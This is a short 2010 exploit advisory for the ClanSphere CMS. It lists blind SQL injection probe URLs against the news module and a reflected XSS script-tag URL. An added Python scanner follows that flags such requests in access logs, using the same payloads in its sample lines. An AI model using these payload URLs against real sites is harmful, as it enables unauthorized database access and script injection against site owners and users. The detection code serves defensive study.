############################################################################
# Exploit Title: Clansphere Multiple vulnerabilities
# Date: 24/08/2010
# Author: Sweet
# Contact: charif38@hotmail.fr
# Software Link:
# Download: http://sourceforge.net/projects/clansphere/
# Version: all
# Tested on: WinXP SP3
# Risk: High
# Description: clansphere offers some nice features for you to easily set
# up and maintain your proper clan site within minutes!
############################################################################
1- Blind SQL injection:
http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+
http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+
2- XSS:
http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>
Enjoy your iftar, and 1,2,3 viva l'Algérie :))
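
Added example (not part of the original advisory and not ClanSphere code): a Python check that flags requests shaped like items 1 and 2 in web-server access logs. The parameter typing (id, year, month as integers; mod, action, from as short identifiers), the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: these parameters carry plain integers, as in the advisory's URLs.
NUMERIC_PARAMS = {"id", "year", "month"}
# Assumption: these carry short identifiers such as "news", "recent", "list".
TOKEN_PARAMS = {"mod", "action", "from"}
NUMERIC_RE = re.compile(r"[0-9]{1,10}")
TOKEN_RE = re.compile(r"[A-Za-z0-9_]{1,32}")
MARKUP_RE = re.compile(r"[<>\"']")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def inspect_target(target):
    """Return findings for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    # Text after index.php in the path is PATH_INFO; markup there matches item 2.
    _, sep, path_info = unquote(parts.path).partition("index.php")
    if sep and MARKUP_RE.search(path_info):
        findings.append("markup in path after index.php")
    # parse_qsl percent-decodes each value and turns '+' into a space.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not NUMERIC_RE.fullmatch(value):
            findings.append("non-numeric " + name)
        elif name in TOKEN_PARAMS and not TOKEN_RE.fullmatch(value):
            findings.append("unexpected characters in " + name)
    return findings


def scan(log_lines):
    """Map 1-based line numbers to findings for lines that look suspicious."""
    hits = {}
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        findings = inspect_target(match.group(1)) if match else []
        if findings:
            hits[number] = findings
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Aug/2010:10:00:01 +0000] "GET /clansphere/index.php?mod=news&action=recent&id=0&from=list HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Aug/2010:10:00:07 +0000] "GET /clansphere/index.php?mod=news&action=recent&id=0&from=list%27+and+31337-31337=0+--+ HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Aug/2010:10:00:09 +0000] "GET /clansphere/index.php?mod=news&action=recent&year=2009&month=8%22+and+31337-31337=0+--+ HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Aug/2010:10:00:12 +0000] "GET /clansphere/index.php/%3E%22%3E%3CScRiPt%3Ealert(%22sweet%22)%3C/ScRiPt%3E HTTP/1.1" 200 5120',
]
```

Calling scan(SAMPLE_LOG) reports lines 2, 3 and 4 and leaves the ordinary request on line 1 alone. The same allowlist checks can be applied at the application's input boundary so that such values are rejected before they reach a query or a page.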